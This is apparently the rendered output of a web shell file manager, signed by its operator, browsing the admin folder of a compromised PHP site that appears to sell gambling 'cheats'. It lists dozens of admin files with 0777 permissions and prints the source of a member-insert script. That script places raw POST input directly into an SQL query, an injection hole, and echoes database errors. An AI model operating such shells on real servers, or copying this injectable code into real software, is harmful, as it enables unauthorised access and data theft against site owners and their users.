Submit
Path:
~
/
home
/
ampckwxt
/
.trash
/
admin
/
File Content:
proses_tambah_member_admin.php
<?php session_start(); include '../includes/koneksi.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $jenis_cheat = $_POST['jenis_cheat']; $winrate = isset($_POST['winrate']) ? 1 : 0; $jackpot = isset($_POST['jackpot']) ? 1 : 0; $jam_jp = $_POST['jam_jp']; $nomor_telepon = $_POST['nomor_telepon']; $query = "INSERT INTO data_member (username, jenis_cheat, winrate, jackpot, jam_jp, nomor_telepon) VALUES ('$username', '$jenis_cheat', '$winrate', '$jackpot', '$jam_jp', '$nomor_telepon')"; if (mysqli_query($conn, $query)) { echo 'success'; } else { http_response_code(500); echo 'Database error: ' . mysqli_error($conn); } } ?>
Submit
FILE
FOLDER
Name
Size
Permission
Action
adminlte
---
0777
assets
---
0777
member
---
0777
.htaccess
42 bytes
0777
all_data.php
24882 bytes
0777
atur_akses.php
3474 bytes
0777
dashboard_admin.php
11051 bytes
0777
database-baru.sql
1542 bytes
0777
edit_admin.php
2224 bytes
0777
error_log
10607 bytes
0777
export_admin.php
659 bytes
0777
export_member_excel.php
1462 bytes
0777
form_register_admin.php
4243 bytes
0777
ganti_password_admin.php
2078 bytes
0777
get_dashboard_chart_data.php
937 bytes
0777
get_member.php
318 bytes
0777
get_member_data.php
1313 bytes
0777
hapus_admin.php
1310 bytes
0777
hapus_member.php
1160 bytes
0777
hapus_semua_member.php
258 bytes
0777
index.php
2592 bytes
0777
kelola_admin.php
9486 bytes
0777
kelola_member.php
13463 bytes
0777
koneksi.php
466 bytes
0777
logout.php
84 bytes
0777
proses_edit_member.php
1163 bytes
0777
proses_ganti_password_admin.php
848 bytes
0777
proses_login_admin.php
2130 bytes
0777
proses_pengaturan_member.php
1875 bytes
0777
proses_tambah_member.php
2690 bytes
0777
proses_tambah_member_admin.php
768 bytes
0777
N4ST4R_ID | Naxtarrr